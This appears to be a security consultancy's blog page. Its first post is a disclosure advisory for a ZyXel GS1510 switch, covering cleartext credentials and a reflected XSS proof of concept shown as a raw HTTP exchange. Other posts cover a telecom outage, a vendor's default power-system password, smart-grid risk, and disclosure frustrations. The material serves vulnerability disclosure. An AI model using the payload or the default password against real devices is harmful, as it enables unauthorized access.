Blog « IT Security Geeks

A few of weeks ago, one of the vulnerabilities that we identified was publicly released on Upsploit.com. These vulnerabilities were discovered in our testing environment while playing around with a ZyXel GS1510 ethernet switch.

This advisory was publicly released on the 2012-03-14 12:57:15 with an Upsploit reference of UPS-2011-0042.

The vulnerabilities that were discovered where the following:

1. The cookie for the admin user of the switch stored both the admin username password in clear text within the cookie.

2. The passwords of any users logging into the switch were being submitted in clear text over HTTP via the following form:

http://192.168.1.5/webctrl.cgi

HTTP Request

GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

3. Cross Site Scripting

The payload fe07b</title><script>alert(xss)</ script>b7e71e54af6 was submitted in the name of an arbitrarily supplied request parameter.

This input was echoed unmodified in the application’s response, as can be seen below.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response.

Request

GET /images/?fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;b7e71e54af6=1 HTTP/1.1 Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Cookie: admin=password123

Response

HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Date: Sun, 18 Sep 2011 16:30:14 GMT Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT Accept-Ranges: bytes
Connection: close
&lt;HTML&gt;
&lt;HEAD&gt;&lt;TITLE&gt;Index of /images/?fe07b&lt;/title&gt;&lt;script&gt;alert(1)&lt;/script&gt;b7e71e54af6=1&lt;/TITLE&gt;&lt;/HEAD&gt; &lt;BODY BGCOLOR=&quot;#99cc99&quot; TEXT=&quot;#000000&quot; LINK=&quot;#2020ff&quot; VLINK=&quot;#4040cc&quot;&gt;
&lt;H2&gt;Index of /images/?fe
…[SNIP]…

Congratulations go out to Neil Fryer for identifying and reporting this issue.

We would also like to extend out gratitude to the staff at ZyXel and also the guys at Upsploit.com for working with us to get these vulnerabilities patched in a timely manner.

This is just another reason why it’s always a good idea to have a penetration test or at the very least a vulnerability assessment conducted on all new devices that will be deployed within your organisations network.

If you would like any details on our device security testing or penetration testing services please feel free to contact us.

Loss of data and system downtime is a problem. For most people reading this, this is a self evident truth. Though what I find “on-the-ground” is a wholly different and unsavoury matter altogether.

I was recently socialising off-the-clock with a few folks in the telecommunications industry and a story was relayed to me. A story that prompted me to clock in as a security professional to offer advice and guidance, as I could not in good conscience let it pass without at least pointing a few things out.

During the course of the week starting 19/03/12, an operating company of a very large mobile operator experienced a system outage.

The system outage impacted the operators soft revenue generation mechanism (Call completion to terminating subscriber when subscriber is IMSI detached) for a significant portion of that region’s subscriber base. It happens. Hardware does not last forever. In particular, hard drives have a limited lifespan. How you prevent widespread impact of drive losses is well known. Effective storage system design, a hardline approach to backups as well as competent intervention teams (vendor and operator) and system re-engineering as a result of effective problem management.

By time I had heard about the problem, it was still ongoing and had been for days and had been attributed to a “Known Error” which had occurred many times in the past on this vendor’s product line.

The vendor field intervention team reacted to the client report and reverted back to their global support center. A JBOD had failed.

Recommended intervention which would not have resolved the outage, cemented the problem by corrupting the root filesystem. This further aggravated the outage by introducing further system failures. This “Known Error” had clearly not been effectively documented in the vendor’s knowledge base, nor had it been addressed with effective problem management despite it’s prior occurrence globally. Nor was the senior support person assisting the incident response team sufficiently qualified to deliver support.

The last backup performed was 2 years prior, and when it was restored, did not work – I won’t go into why, but I will say the 2010 backup was not sane and therefore useless and essentially not a backup.

Not only was there no backup policy in place for a production system. Which in itself is a violation of the operator’s mandate for systems under control of Vendor Managed Services, but for years the field teams did not follow internal Field Change procedures laid out i.e. Backups before and after implementation of Field Change Orders – several Change Orders had been implemented in the past two years.

A sad state of affairs. Fortunately, this problem could have been resolved with a few more hours of work and a sound understanding of Unix. On a system that is built around 4 Unix boxes, a number of Linux machines, and a few instances of a Real Time OS’, one would expect incident response teams to be knowledgable or have the means to solve these problems within the team. They could not; and subsequently a senior vendor resource had to be flown in to the region unnecessarily, at great expense (long haul flight, hotel, per diem) to perform the rebuild. A rebuild that could have been procured on a day rate from skilled resources in region at a fraction of the overall cost and with a quicker turn-around time.

So, we have a loss of operator revenue, data, reputation and a severe impact on vendor operational expenditure and reputation.

All of this is simply a compounded effect of:

• Poor procedure
• Lack of stakeholder oversight
• Poor Service Level Agreement management
• Poor risk analysis and impact assessments associated with Managed Service contracts
• Low cost and arguably inadequate resources tied to Managed Services
• Absence of training and development of aforementioned resources
• Lack of regular, independent assessment and testing of Managed Services capabilities
• Lack of regular, independent assessment and testing of Vendor Support mechanisms

The requirement of a well defined penetration testing program is more than just testing your estate from Cyber Attack. It’s about identifying all vulnerabilities in your operation, be they physical, technical or human in nature. Penetration testing needs to be a full time consultancy covering all aspects of your business, no matter what.

McAfee’s latest proof-of-concept showed the ability to seriously injure someone with a direct cyber attack. This involved an attack on an insulin implant pump. The pump could be induced to fully discharge it’s contents. In a diabetic, this will cause hypoglycæmia. This may result in death or brain damage if prolonged.

We’d like to congratulate Barnaby Jack for bringing attention to this.

We at I.T. Security geeks have long held the belief that this sort of thing is possible. While our focus has largely been directed at conventional, common place vulnerabilities we spend a fair amount of time working with obscure appliances and identifying issues with those products.

In my own area of influence, I’ve exploited rectifiers in controlled circumstances to effect power failures and fires (Easier than Jack’s Medtronic exploit, as you really don’t need to have much knowledge and most rectifiers are deployed with factory default PIN codes for administrator access). Don’t believe me? One of the world’s foremost suppliers of DC power systems has a default password for the user: “Admin” that is: “1″

Yes, the number 1.

I have personally accessed production power systems in operators where this default was discovered, and upon making my recommendations for immediate action was told, “No. We keep it like that to make it easier for our technicians.” or “We don’t perceive a problem with that.”

No perceived problem? How so? The manual for this particular device tells me:

The User has full access to all menus; including update the OS application and modifying, adding, and deleting Users.

Via the WEB Interface, a User (with proper access level) can:

View real-time operating information (rectifiers, converters, AC, DC, Batteries, etc.).

View and download information recorded in logs.

Send control commands.

Set programmable parameters.

Download and upload configuration files.

Download firmware to the Controller.

Curious, is it not?

I truly guarantee that if you are a telecommunications operator or co-location provider, you have this vendor’s product somewhere in your network. Call us to chat.

Smart grids are being hailed as a potential solution to the impending energy supply problems the world will face over the coming years.

The intent is to intelligently manage use in accordance with supply and alter tariffs to drive healthy usage patterns; Fair enough. It’s clever business welcomed by all, that is if we ignore the obvious high cost of delivery.

Accounting and sentiment aside, the real issue we see is the inherent risk in creating a management network such as a smart grid.

Many current investigations into the technology, as well as planned deployments tout trendy capabilities.

Mobile device compatibility i.e. the ability to control your homes appliances remotely to take advantage of low tariff times. Despite the obvious limitations in the theory, I am somewhat surprised that this is even being thought of anywhere; that is anywhere with an eye on Health and Safety.

Random and malicious attacks on grid residents could compromise authentication details in a number of ways and while mischief and damage could result, the same problem exists elsewhere where damage would be so much more significant.

Mobile Network Infrastructure 

In the ever demanding economic climate, many telecommunications operators across the globe have invested significantly in expenditure reduction programs.

In one way or another, smart meters are finding themselves part and parcel of a mobile network for this reason. Smart meter solutions get installed with relays for cutting supplies of energy, allowing to switch energy sources or disconnecting of subtended devices such as network equipment.

In almost all cases, solutions are scoped in a manner that gives very little consideration to direct attack scenarios. It is a fact most solutions are sold on the basis of cost savings, unified control and management capabilities and not security. If we are learning one thing of late, it is co-ordinated infrastructure attacks are possible and happening as we speak. We are also certain Iranian Nuclear Enrichment facilities are a lot harder to penetrate than your average mobile operator and it was done with impunity and anonymity.

It’s not all doom and gloom though, our high value penetration testing team at I.T. Security geeks can help. Contact us for more information.

We have recently added a button to the side of our web site for people to click and donate directly via PayPal to the Brad Smith fund, as we can’t imagine what his family must be going through right now.

For those readers who don’t know who Brad Smith is, he’s a talented and humorous security professional, who also goes by the online name of the “theNurse”.

During Brad’s presentation at the Hacker Halted conference in Florida, he suffered from a massive stroke and has been in a coma in hospital since then.

The guys over at Social-Engineer.org along with @humanhacker set up this donation for Brad’s family to assist with any out of pocket expenses that they have.

We couldn’t haven’t worded this better, so to quote the guys over at Social-Engineer.org

“Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. ”

SocialEngineer.org have a update page up and running with updates from Brad’s wife Nina, which can be found here.

On the 28th September 2011, we notified a vendor about multiple security vulnerabilities in one of their products, and requested contact details of who to send the details on to.

The initial response from the vendor support team took 6 days.

The complete details of the vulnerabilities were disclosed to the vendor on the 5th October. These included screen shots, HTTP requests and responses, and Proof of Concept code for the vulnerabilities. After that no response was received.

We then sent another e-mail to the vendor on the 11th October, asking for an update on these issues, or if they had even received our original e-mail with the details of the vulnerabilities.

We received no response from the vendor.

On the 8th November, we finally received a response stating “These have been replicated by R&D and they will fix in a later release.” No “Thanks for your help guys”, no dates that these will be patched, no responses to our other queries.

We followed this e-mail up with a response to the vendor, asking to work together on a timed release, and to agree on some reasonable dates. The vendor response was “I have asked for timescales for the fixes and will update you when these are released.”

Now just to be clear, we are not getting paid to disclose these vulnerabilities to any vendors. We are doing this to help make the Internet and networks in general a safer place for all.

We don’t ask for much, just credit for the disclosure of the vulnerability, and a timely patch to mitigate the vulnerabilities. It really doesn’t need to be this difficult to report vulnerabilities, and a little bit of thanks and courtesy never hurt anyone.

To all software and hardware vendors out there, can you please take a few moments to read the Wikipedia article on Responsible Disclosure, which can be found here. Then please try to work with your relevant teams, to make it easier to report vulnerabilities in your code, and work with you.

We understand that not all vendors can afford to hire fully fledged security teams, and most security professionals are willing to help you secure your applications and devices just for the credit of finding the vulnerability in your product. That’s got to be the cheapest application security assessment that you’ve ever had!

Little things, like an e-mail address, or a form on your website to contact your product security team, or even your developers would make the world of difference. This would also help to make sure that we as security researchers, contact the relevant teams within your organisation right off the bat (and don’t get sent around the houses, trying to do you a favour). This way, we can always deal with the same person (or team) within your organisation, and get any vulnerabilities mitigated in a timely manner.

Please guys and girls, help us to help you. We’re giving you free security advice, educating your developers and strengthening your products, all this for a one liner in your security patch disclosure notification.

Think about it…

As you can see we’ve successfully launched the new version of our web site now, and we’d like to say a huge thank you to Tick Tock Computers for all the hard work that they’ve put into this site.

Hopefully this now makes the site more user friendly, and makes finding what you’re looking for a lot easier. Please keep checking back, as we’ll be regularly updating the company Blog with news and updates.

If you’ve got any comments on the new web site at all, please drop us a line and let us know, we always value customer feedback.

We are pleased to announce that we have recently partnered with SourceFire, the leader in intelligent cyber security solutions.

Having worked with SourceFire in the best, along with other IDS vendors, we honestly believe that SourceFire is the current leader in IDS/IPS technologies, and are honoured to be able to support and sell their offerings going forward.

IT Security Geeks is proud to announce that we have happily partnered with Rapid7. Rapid7 is the leading provider of unified vulnerability management, compliance and penetration testing solutions.

What does this mean to our clients? 

This now means that we are able to sell you the suite of Rapid7 products, such as Metasploit Express, Metasploit Professional, and the range of Nexpose products.

For more info on the Rapid7 range of products or to arrange a demo, please contact us via our contact us page.

We are proud to announce that IT Security Geeks has partnered with IronKey, the leader in secure USB device drives, so we will be selling these devices, and also doing some really exciting things with them.

Website updates will be coming soon, with all the info.